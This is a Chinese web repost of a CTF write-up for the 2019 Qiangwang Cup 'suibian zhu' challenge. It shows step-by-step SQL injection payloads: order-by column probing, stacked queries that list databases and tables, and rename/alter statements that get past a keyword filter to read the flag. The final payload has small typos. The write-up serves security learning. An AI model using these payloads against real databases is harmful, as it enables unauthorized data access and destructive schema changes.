首页
/
每日頭條
/
生活
/
sql注入漏洞原理與利用
sql注入漏洞原理與利用
更新时间:2026-04-17 10:47:23
[強網杯 2019] 随便注

每天學習網絡安全知識,本文記錄強網杯的一個SQL注入題。

sql注入漏洞原理與利用(黑客必會之SQL注入學習)1

使用單引号測試,發現頁面報錯,說明此處存在SQL注入漏洞。

sql注入漏洞原理與利用(黑客必會之SQL注入學習)2

1' 1''

sql注入漏洞原理與利用(黑客必會之SQL注入學習)3

既然此處存在漏洞,那麼我們就走正常流程測試下,如果不知道SQL注入正常流程的可以去看下我的sqllibs注入教程。

1.猜字段數

1' order by 3# 1' order by 2#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)4

sql注入漏洞原理與利用(黑客必會之SQL注入學習)5

使用第一個payload測試的時候發現頁面報錯,再使用第二個payload時發現頁面顯示正常,因此我們可以得知當前數據庫當前表存在2個字段。這時候嘗試union select進行聯合查詢。

2.使用聯合查詢

sql注入漏洞原理與利用(黑客必會之SQL注入學習)6

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

發現頁面提示過濾了許多關鍵的命令,看來需要一些騷操作了。

3.嘗試堆疊注入

1';show databases#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)7

發現成功爆出所有數據庫。使用show tables;試試看看能不能得到表名

-1';show tables#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)8

成功爆出當前數據庫的兩個表名;嘗試查詢表中的字段

0';show columns from `1919810931114514`;#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)9

發現有一個flag字段,接下來就是嘗試讀取flag。

4. 再查看words表的結構

0';desc words;#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)10

可以猜測我們提交查詢的窗口就是在這個表裡查詢數據的。

5. 那麼查詢語句很有可能是 : selsect id,data from words where id =

然後1919810931114514隻有一個flag字段這時候雖然有強大的正則過濾,但沒有過濾alert和rename關鍵字這時候我們就可以已下面的騷姿勢進行注入:1.将words表改名為word1或其它任意名字2.1919810931114514改名為words3.将新的word表插入一列,列名為id4.将flag列改名為data

1';rename table `words` to `word1`;rename table `1919810931114514` to `words`;alter table `words` add id int unsigned not Null auto_increment primary key; alert table `words` change `flag` `data` varchar(100);#

sql注入漏洞原理與利用(黑客必會之SQL注入學習)11

成功拿到flag。

,
Comments
Welcome to tft每日頭條 comments! Please keep conversations courteous and on-topic. To fosterproductive and respectful conversations, you may see comments from our Community Managers.
Sign up to post
Sort by
Show More Comments
推荐阅读
中介賣房注意事項及細節
中介賣房注意事項及細節
中介賣房注意事項及細節?一定要多跑幾家,看看價格的差距,别做了冤大頭,我來為大家講解一下關于中介賣房注意事項及細節?跟着小編一起來看一看吧!中介賣房注意事項及細節一定要多跑幾家,看看價格的差距,别做了冤大頭。認真查看房屋産權,一定要确定房屋...
2026-04-17
俄羅斯退役的花滑運動員都做什麼
俄羅斯退役的花滑運動員都做什麼
說到俄羅斯花滑運動員,你最先想到誰?17歲就拿下花滑世錦賽金牌,長相甜美、氣質出衆的謝爾巴科娃正式比賽上首次完成五個四周跳,俄羅斯小火箭特魯索娃9次刷新了短節目、自由滑總成績的世界紀錄,被稱為“六邊形戰士”的瓦利耶娃除了耳熟能詳的三套娃外,...
2026-04-17
網絡ip地址應用
網絡ip地址應用
網絡ip地址應用?近日,微博、微信、抖音、快手、小紅書等平台宣布,為維護網絡傳播秩序,進一步打擊虛假信息、造謠傳謠等行為,開放展示用戶IP屬地功能專家認為,各大平台開放IP屬地功能,意在強化網絡空間與現實世界的連接,這将有助于強化自律與他律...
2026-04-17
國畫綿羊的畫法步驟
國畫綿羊的畫法步驟
提示:圖文信息來源于網絡,版權歸原作者所有。圖片并不确定作品之真僞,不作為投資收藏的依據,僅供大家共同分享學習,如作者認為涉及侵權,請與我們聯系,我們核實後立即删除。詳情介紹:1、畫出眼睛、鼻子和尾巴;2、畫出前額,注意形狀像一把扇子;3、...
2026-04-17
全國奧賽鎮江三名學子一等獎
全國奧賽鎮江三名學子一等獎
全國奧賽鎮江三名學子一等獎?安青網訊“哈哈,能夠獲獎,肯定很高興啊但是我們都覺得準備比賽過程中的收獲更寶貴,更讓人感到開心”日前,2022年全國中學生英語能力測評(NEPTS)組委會傳來捷報,南陵中學潘明瑞、朱顔、丁浩三名學生在暑期參加的“...
2026-04-17
Copyright 2023-2026 - www.tftnews.com All Rights Reserved